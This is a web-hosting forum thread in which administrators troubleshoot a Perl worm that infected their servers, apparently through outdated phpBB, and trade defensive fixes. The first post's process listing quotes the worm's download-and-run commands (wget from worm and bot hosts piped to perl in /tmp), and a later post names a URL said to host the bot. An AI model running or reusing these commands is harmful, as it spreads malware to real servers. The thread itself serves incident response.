The Community Forums


Help! bot using my resources

Discussion in 'General Discussion' started by petfut, Feb 18, 2005.

  1. petfut (Well-Known Member)
    I have .linuxdaybot running from my tmp dir.
    There are currently several bots running:

    18367 nobody 0 0.0 0.1 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
    18368 nobody 0 0.0 0.2 wget worm.linuxday.com.br -O /tmp/.linuxdayworm
    18421 nobody 0 0.0 0.1 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
    18422 nobody 0 0.0 0.2 wget bot.linuxday.com.br -O /tmp/.linuxdaybot
    18537 nobody 0 0.0 0.1 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
    18538 nobody 0 0.0 0.2 wget worm.linuxday.com.br -O /tmp/.linuxdayworm
    18551 nobody 0 0.0 0.1 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
    18552 nobody 0 0.0 0.2 wget bot.linuxday.com.br -O /tmp/.linuxdaybot

    I don't know how to make it stop.
    Killing won't help; it'll start over again, and removing it from tmp just makes it disappear for a minute.
     
  2. petfut (Well-Known Member)
    Got it to stop. I put the IP into iptables and the hosts.deny list, and restarted Apache.
    It is some Korean website, nbtour.co.kr.
     
  4. gongpro (Member, USA, cPanel Access Level: Root Administrator)
    phpbb

    This worm still seems to be going around. I have been hit twice in the last two weeks. During my research on this, I found that one issue allowing this worm in is an outdated phpBB. I believe it was an issue with version 2.0.14 and older.

    At this time, http://www.pivadesign.com.br/rc/linuxdaybot.txt seems to be the source of the file.
     
    #4 gongpro, Mar 16, 2006
    Last edited: Mar 16, 2006
  5. jameshsi (Well-Known Member)
    Hey, guys:
    I encountered the same problem here. I put the IP into the deny list and restarted Apache, then deleted these files in /tmp. It seems OK for now, but I have 2 concerns:
    1. Are there any other files edited by this worm?
    2. What should I do to correct the phpBB scripts? My phpBB has some modifications by me, and if I just upgrade it, something will go wrong, so I need to find out how to correct the hole in the phpBB scripts. Any advice?
     
  6. johny_gjx (Active Member)
    phpBB has mods for every version that describe the changes, as well as files you may use with the patch command in Linux; however, both may fail depending on how your custom modifications have altered the code. The best is to look through the mods and try to apply them one by one, so you will see conflicts and be able to ignore minor differences due to your mods.

    Even if you use the patch command and do a partially successful upgrade, it would be better than just trying to figure out holes and fixing them.

    As for the server-related question, it's not possible to predict what may happen, but see WHT for tutorials on securing /tmp. If you are on a VPS it would be hard to secure that completely, but at the least one can set a cron command to be notified daily of everything with x permission there.
     
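    The daily "anything with x permission in /tmp" check suggested above, written out as an added example (not code from the thread or from any poster); the scan directory and the sample files it creates are constructed for demonstration, and the bot filenames mirror the ones in the first post.

```shell
#!/bin/sh
# Added example, not code from the thread: a cron-friendly scan that reports
# every regular file carrying an execute bit under a directory such as /tmp,
# the daily check johny_gjx describes. The scan directory and sample files
# below are constructed so the script runs stand-alone.

# find_exec_files DIR: list regular files under DIR with any execute bit set
# (octal tests for portability), showing owner and mode via ls -ld. Hidden
# files are included, since the bot in this thread lives at /tmp/.linuxdaybot.
find_exec_files() {
    find "$1" -xdev -type f \
        \( -perm -100 -o -perm -010 -o -perm -001 \) \
        -exec ls -ld {} \; 2>/dev/null
}

# count_exec_files DIR: number of such files, useful as an alert threshold
# (a clean /tmp on a web server should normally report 0).
count_exec_files() {
    find "$1" -xdev -type f \
        \( -perm -100 -o -perm -010 -o -perm -001 \) 2>/dev/null | wc -l | tr -d ' '
}

# Constructed sample tree: one harmless session file, one hidden Perl script
# with the execute bit set, and the worm's marker file without it.
SCAN_DIR=$(mktemp -d)
trap 'rm -rf "$SCAN_DIR"' EXIT
printf 'session data\n' > "$SCAN_DIR/sess_abc123"
printf '#!/usr/bin/perl\nprint "bot\\n";\n' > "$SCAN_DIR/.linuxdaybot"
chmod 755 "$SCAN_DIR/.linuxdaybot"
: > "$SCAN_DIR/.linuxdayinfected"

# Report: only .linuxdaybot should be listed.
find_exec_files "$SCAN_DIR"
echo "executable files found: $(count_exec_files "$SCAN_DIR")"
# In production, run find_exec_files /tmp from a script scheduled by cron
# and pipe its output to mail so root sees the report every morning.
```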
  7. jameshsi (Well-Known Member)
    After I chmod 700 wget, it seems OK for now, although the phpBB still remains not upgraded.
     
  8. johny_gjx (Active Member)
    I don't know, but what about GET and lynx and curl? lynx has a --dump switch; that's why it came to my mind here.
     
  9. jameshsi (Well-Known Member)
    I just found that hackers will use lwp-download to download files, so I just did chmod 700 on lwp-download.
     
  10. tazman2000 (Active Member, Liverpool, UK, cPanel Access Level: Root Administrator)
    I've been hacked twice on the latest IPB board scripts, so I'm currently converting them all to VB, which I've never had any security issues with, having run one for 5 years. Serves me right for going for the cheaper option :rolleyes:
     